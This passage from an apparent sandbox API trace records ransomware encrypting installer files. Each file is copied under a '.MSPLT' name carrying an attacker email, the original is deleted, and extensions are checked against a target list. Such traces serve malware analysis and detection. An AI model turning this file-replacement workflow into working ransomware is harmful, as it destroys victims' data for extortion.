(lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0175.870] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=495616) returned 1 [0175.870] CloseHandle (hObject=0x374) returned 1 [0175.870] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 0x80 [0175.871] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0175.871] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0175.871] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.871] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.871] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0175.871] GetLastError () returned 0x0 [0175.871] ReadFile (in: hFile=0x374, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x79000, lpOverlapped=0x0) returned 1 [0175.948] WriteFile (in: hFile=0x36c, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x79010, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x79010, lpOverlapped=0x0) returned 1 [0175.960] ReadFile (in: hFile=0x374, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0175.960] WriteFile (in: hFile=0x36c, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x100, lpOverlapped=0x0) returned 1 [0175.960] SetEndOfFile (hFile=0x36c) returned 1 [0175.961] CloseHandle (hObject=0x36c) returned 1 [0175.973] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0175.973] SetEndOfFile (hFile=0x374) returned 1 [0175.979] CloseHandle (hObject=0x374) returned 1 [0175.979] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0175.980] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi")) returned 1 [0175.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0175.980] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0175.980] lstrlenW (lpString=".doc") returned 4 [0175.980] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0175.980] lstrlenW (lpString=".docx") returned 5 [0176.401] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0176.401] lstrlenW (lpString=".pdf") returned 4 [0176.401] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0176.401] lstrlenW (lpString=".xls") returned 4 [0176.401] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0176.401] lstrlenW (lpString=".xlsx") returned 5 [0176.401] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0176.401] lstrlenW (lpString=".ppt") returned 4 [0176.401] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0176.401] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.401] lstrlenW (lpString=".zip") returned 4 [0176.401] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0176.401] lstrlenW (lpString=".rar") returned 4 [0176.401] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0176.401] lstrlenW (lpString=".bz2") returned 4 [0176.401] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0176.401] lstrlenW (lpString=".7z") returned 3 [0176.401] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0176.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.402] lstrlenW (lpString=".dbf") returned 4 [0176.402] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0176.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.402] lstrlenW (lpString=".1cd") returned 4 [0176.402] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0176.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.402] lstrlenW (lpString=".jpg") returned 4 [0176.402] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0176.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.402] lstrlenW (lpString=".doc") returned 4 [0176.402] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0176.402] lstrlenW (lpString=".docx") returned 5 [0176.402] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0176.402] lstrlenW (lpString=".pdf") returned 4 [0176.402] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0176.402] lstrlenW (lpString=".xls") returned 4 [0176.402] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0176.402] lstrlenW (lpString=".xlsx") returned 5 [0176.402] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0176.402] lstrlenW (lpString=".ppt") returned 4 [0176.402] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0176.402] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.402] lstrlenW (lpString=".zip") returned 4 [0176.402] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0176.402] lstrlenW (lpString=".rar") returned 4 [0176.402] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0176.402] lstrlenW (lpString=".bz2") returned 4 [0176.402] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0176.402] lstrlenW (lpString=".7z") returned 3 [0176.403] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0176.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.403] lstrlenW (lpString=".dbf") returned 4 [0176.403] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0176.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.403] lstrlenW (lpString=".1cd") returned 4 [0176.403] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0176.403] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 44 [0176.403] lstrlenW (lpString=".jpg") returned 4 [0176.403] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0176.403] lstrcmpiW (lpString1=".msi", lpString2=".MSPLT") returned -1 [0176.403] lstrlenW (lpString="RGB9RAST_x64.msi") returned 16 [0176.403] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0176.404] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=184832) returned 1 [0176.404] CloseHandle (hObject=0x2d4) returned 1 [0176.404] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 0x80 [0176.404] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.404] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0176.404] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.404] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.404] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0176.405] GetLastError () returned 0x0 [0176.405] ReadFile (in: hFile=0x2d4, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x2d200, lpOverlapped=0x0) returned 1 [0176.412] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x2d210, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x2d210, lpOverlapped=0x0) returned 1 [0176.417] ReadFile (in: hFile=0x2d4, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0176.418] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0176.418] SetEndOfFile (hFile=0x2f4) returned 1 [0176.419] CloseHandle (hObject=0x2f4) returned 1 [0176.425] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.425] SetEndOfFile (hFile=0x2d4) returned 1 [0176.428] CloseHandle (hObject=0x2d4) returned 1 [0176.428] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0176.428] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi")) returned 1 [0176.428] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.428] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.428] lstrlenW (lpString=".doc") returned 4 [0176.428] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0176.428] lstrlenW (lpString=".docx") returned 5 [0176.428] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0176.428] lstrlenW (lpString=".pdf") returned 4 [0176.429] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0176.429] lstrlenW (lpString=".xls") returned 4 [0176.429] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0176.429] lstrlenW (lpString=".xlsx") returned 5 [0176.429] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0176.429] lstrlenW (lpString=".ppt") returned 4 [0176.429] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0176.429] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.429] lstrlenW (lpString=".zip") returned 4 [0176.429] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0176.429] lstrlenW (lpString=".rar") returned 4 [0176.429] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0176.429] lstrlenW (lpString=".bz2") returned 4 [0176.429] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0176.429] lstrlenW (lpString=".7z") returned 3 [0176.429] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0176.429] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.429] lstrlenW (lpString=".dbf") returned 4 [0176.429] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0176.429] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.429] lstrlenW (lpString=".1cd") returned 4 [0176.429] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0176.429] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.429] lstrlenW (lpString=".jpg") returned 4 [0176.429] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0176.429] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.429] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.429] lstrlenW (lpString=".doc") returned 4 [0176.430] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0176.430] lstrlenW (lpString=".docx") returned 5 [0176.430] lstrcmpiW (lpString1=".docx", lpString2="4.msi") returned -1 [0176.430] lstrlenW (lpString=".pdf") returned 4 [0176.430] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0176.430] lstrlenW (lpString=".xls") returned 4 [0176.430] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0176.430] lstrlenW (lpString=".xlsx") returned 5 [0176.430] lstrcmpiW (lpString1=".xlsx", lpString2="4.msi") returned -1 [0176.430] lstrlenW (lpString=".ppt") returned 4 [0176.430] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0176.430] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.430] lstrlenW (lpString=".zip") returned 4 [0176.430] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0176.430] lstrlenW (lpString=".rar") returned 4 [0176.430] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0176.430] lstrlenW (lpString=".bz2") returned 4 [0176.430] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0176.430] lstrlenW (lpString=".7z") returned 3 [0176.430] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0176.430] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.430] lstrlenW (lpString=".dbf") returned 4 [0176.430] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0176.430] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.430] lstrlenW (lpString=".1cd") returned 4 [0176.430] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0176.430] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 38 [0176.430] lstrlenW (lpString=".jpg") returned 4 [0176.430] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0176.430] lstrcmpiW (lpString1=".msi", lpString2=".MSPLT") returned -1 [0176.430] lstrlenW (lpString="RGB9Rast_x86.msi") returned 16 [0176.431] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0176.431] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=94720) returned 1 [0176.431] CloseHandle (hObject=0x2d4) returned 1 [0176.431] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 0x80 [0176.431] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.431] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0176.431] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.431] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.431] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0176.432] GetLastError () returned 0x0 [0176.432] ReadFile (in: hFile=0x2d4, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x17200, lpOverlapped=0x0) returned 1 [0176.435] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x17210, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x17210, lpOverlapped=0x0) returned 1 [0176.438] ReadFile (in: hFile=0x2d4, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0176.438] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0xf4, lpOverlapped=0x0) returned 1 [0176.438] SetEndOfFile (hFile=0x2f4) returned 1 [0176.438] CloseHandle (hObject=0x2f4) returned 1 [0176.441] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.441] SetEndOfFile (hFile=0x2d4) returned 1 [0176.442] CloseHandle (hObject=0x2d4) returned 1 [0176.443] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0176.443] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 1 [0176.443] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.443] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.443] lstrlenW (lpString=".doc") returned 4 [0176.443] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0176.444] lstrlenW (lpString=".docx") returned 5 [0176.444] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0176.444] lstrlenW (lpString=".pdf") returned 4 [0176.444] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0176.444] lstrlenW (lpString=".xls") returned 4 [0176.444] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0176.444] lstrlenW (lpString=".xlsx") returned 5 [0176.444] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0176.444] lstrlenW (lpString=".ppt") returned 4 [0176.444] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0176.444] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.444] lstrlenW (lpString=".zip") returned 4 [0176.444] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0176.444] lstrlenW (lpString=".rar") returned 4 [0176.444] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0176.444] lstrlenW (lpString=".bz2") returned 4 [0176.444] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0176.444] lstrlenW (lpString=".7z") returned 3 [0176.444] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0176.444] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.444] lstrlenW (lpString=".dbf") returned 4 [0176.444] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0176.444] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.444] lstrlenW (lpString=".1cd") returned 4 [0176.444] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0176.444] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.444] lstrlenW (lpString=".jpg") returned 4 [0176.445] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0176.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.445] lstrlenW (lpString=".doc") returned 4 [0176.445] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0176.445] lstrlenW (lpString=".docx") returned 5 [0176.445] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0176.445] lstrlenW (lpString=".pdf") returned 4 [0176.445] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0176.445] lstrlenW (lpString=".xls") returned 4 [0176.445] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0176.445] lstrlenW (lpString=".xlsx") returned 5 [0176.445] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0176.445] lstrlenW (lpString=".ppt") returned 4 [0176.445] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0176.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.445] lstrlenW (lpString=".zip") returned 4 [0176.445] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0176.445] lstrlenW (lpString=".rar") returned 4 [0176.445] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0176.445] lstrlenW (lpString=".bz2") returned 4 [0176.445] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0176.445] lstrlenW (lpString=".7z") returned 3 [0176.445] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0176.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.445] lstrlenW (lpString=".dbf") returned 4 [0176.445] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0176.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.445] lstrlenW (lpString=".1cd") returned 4 [0176.445] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0176.445] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0176.446] lstrlenW (lpString=".jpg") returned 4 [0176.446] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0176.446] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0176.446] lstrlenW (lpString="Setup.exe") returned 9 [0176.446] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0176.446] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=78152) returned 1 [0176.446] CloseHandle (hObject=0x2d4) returned 1 [0176.446] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe")) returned 0x80 [0176.446] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.447] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0176.447] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.447] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.447] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setup.exe.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0179.393] GetLastError () returned 0x0 [0179.393] ReadFile (in: hFile=0x2d4, lpBuffer=0x3d6b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesRead=0x37dfecc*=0x13148, lpOverlapped=0x0) returned 1 [0179.784] WriteFile (in: hFile=0x388, lpBuffer=0x3d6b020*, nNumberOfBytesToWrite=0x13150, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3d6b020*, lpNumberOfBytesWritten=0x37dfc94*=0x13150, lpOverlapped=0x0) returned 1 [0179.811] ReadFile (in: hFile=0x2d4, 